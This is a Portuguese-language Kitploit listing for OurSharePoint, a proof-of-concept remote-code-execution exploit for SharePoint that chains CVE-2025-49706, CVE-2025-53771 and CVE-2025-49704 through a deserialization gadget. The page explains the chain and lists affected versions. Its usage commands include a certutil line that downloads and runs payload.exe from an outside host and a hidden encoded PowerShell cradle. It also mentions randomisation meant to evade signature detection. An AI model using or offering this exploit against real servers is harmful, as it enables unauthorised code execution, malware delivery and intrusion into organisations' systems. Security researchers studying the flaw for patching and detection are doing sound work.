Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
OurSharePoint-CVE-2025-53770 — Você realmente acha que o SharePoint é seguro? | Kitploit
Ferramentas/GitHubGitHub/rabbitbong/oursharepoint-cve-2025-53770
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubrabbitbong/oursharepoint-cve-2025-53770

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

OurSharePoint-CVE-2025-53770

Você realmente acha que o SharePoint é seguro?

Ver Repositório
21há 5 mesesAinda não revisado

OurSharePoint — CVE-2025-53770 PoC

Ferramenta RCE autossuficiente para SharePoint em um único binário. Gera uma cadeia de gadgets TypeConfuseDelegate como bytes brutos MS-NRBF (sem ysoserial.exe), encapsula em uma carga útil de desserialização DataSet e entrega via HTTP usando a bypass de autenticação — tudo em um único disparo.


Cadeia de Exploração

EtapaCVEDescrição
1CVE-2025-49706Bypass de autenticação — Referer: /_layouts/SignOut.aspx ignora a autenticação do SharePoint
2CVE-2025-53771Bypass de patch — segmento de caminho após ToolPane.aspx evita a correção de julho de 2025
3CVE-2025-49704Desserialização — ExcelDataSet.CompressedDataTable aciona BinaryFormatter em um DataSet manipulado
4—O esquema do DataSet força LosFormatter.Deserialize() na carga interna via ExpandedWrapper + ObjectDataProvider
5—TypeConfuseDelegate — o comparador de SortedSet<string> é Process.Start(string, string), executando cmd /c <comando>

Todo o fluxo binário (tanto o wrapper DataSet externo quanto o gadget TypeConfuseDelegate interno) é construído como registros MS-NRBF brutos — nenhuma serialização em tempo de execução .NET é usada. Isso corresponde ao formato produzido pelo módulo Metasploit byte a byte.


Compilar

Requer .NET Framework 4.8 SDK (Visual Studio 2022 ou Build Tools autônomo):

root@kitploit:~
& "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" OurSharePoint.sln /p:Configuration=Release

Saída: OurSharePoint\bin\Release\OurSharePoint.exe (arquivo único, sem dependências)


Uso

Disparo único: preparar e executar

root@kitploit:~
OurSharePoint.exe --cmd="certutil -urlcache -split -f http://10.0.0.5/payload.exe C:\Windows\Temp\p.exe & C:\Windows\Temp\p.exe" --target=https://sp.corp.com

Execução simples de comando

root@kitploit:~
OurSharePoint.exe --cmd="whoami > C:\Windows\Temp\pwned.txt" --target=https://sp.corp.com

Cradle PowerShell

root@kitploit:~
OurSharePoint.exe --cmd="powershell -nop -w hidden -enc <base64>" --target=https://sp.corp.com

Apenas reconhecimento (sem carga útil)

root@kitploit:~
OurSharePoint.exe --target=https://sp.corp.com --check

Compilar arquivos de carga útil offline

root@kitploit:~
OurSharePoint.exe --cmd="calc.exe" --out=exploit

Com proxy (Burp)

root@kitploit:~
OurSharePoint.exe --cmd="whoami" --target=https://sp.corp.com --proxy=http://127.0.0.1:8080

Legado: carga útil externa do ysoserial.exe

root@kitploit:~
ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c calc.exe" > gadget.b64
OurSharePoint.exe --in=gadget.b64 --target=https://sp.corp.com

Opções


Arquivos de Saída

Quando --out é usado, a ferramenta escreve:

ArquivoConteúdo
<prefix>.binFluxo DataSet BinaryFormatter bruto
<prefix>.b64Codificado em GZip + Base64 (o que vai em CompressedDataTable)

Versões Afetadas

EdiçãoFaixa Vulnerável
SharePoint Server Subscription Edition16.0.14326.20450 – 16.0.18526.20424
SharePoint Server 201916.0.10337.12109 – 16.0.10417.20027
SharePoint Enterprise Server 201616.0.4351.1000 – 16.0.5508.1000
SharePoint Server 201315.0.4481.1005 – 15.0.5545.1000

Notas de Implementação

  • Sem serialização em tempo de execução — Tanto o wrapper DataSet quanto o gadget TypeConfuseDelegate são escritos como registros binários MS-NRBF brutos usando BinaryWriter. Isso evita diferenças entre a saída da serialização em tempo de execução .NET e o que o desserializador alvo espera.
  • Estruturação LosFormatter — O gadget interno é encapsulado com bytes de cabeçalho ObjectStateFormatter (0xFF 0x01 0x32 + comprimento de 7 bits) em vez de usar LosFormatter.Serialize().
  • Binário único — Nenhuma ferramenta externa, DLL ou script Python é necessário. O .exe é totalmente autossuficiente.
  • Aleatorização — Prefixos de tags XML e nomes de elementos DataSet são aleatorizados a cada execução para evitar detecção por assinatura.

Referências

  • Eye Security — SharePoint Sob Cerco
  • Metasploit PR #20409 — sharepoint_toolpane_rce
  • Especificação MS-NRBF
  • pwntester/ysoserial.net — TypeConfuseDelegate
Baixar ferramenta
FlagDescriçãoPadrão
--cmd=COMMANDComando a executar (executa como cmd /c COMMAND)—
--in=FILEArquivo de carga útil LosFormatter pré-construído em base64—
--target=URLURL base do SharePoint para entrega HTTP—
--checkApenas identificar versão, sem carga útil—
--out=PREFIXPrefixo do arquivo de saídapayload
--sp-version=VERVersão do caminho Layouts (15 ou 16)15
--proxy=URLProxy HTTP—
--ua=STRINGUser-Agent personalizadoFirefox 120
--referer=URLSobrescrever Referer de bypass de autenticaçãoauto
--timeout=SECTimeout HTTP15
--a/b/c=NAMENomes do DataSet/elemento/colunaaleatório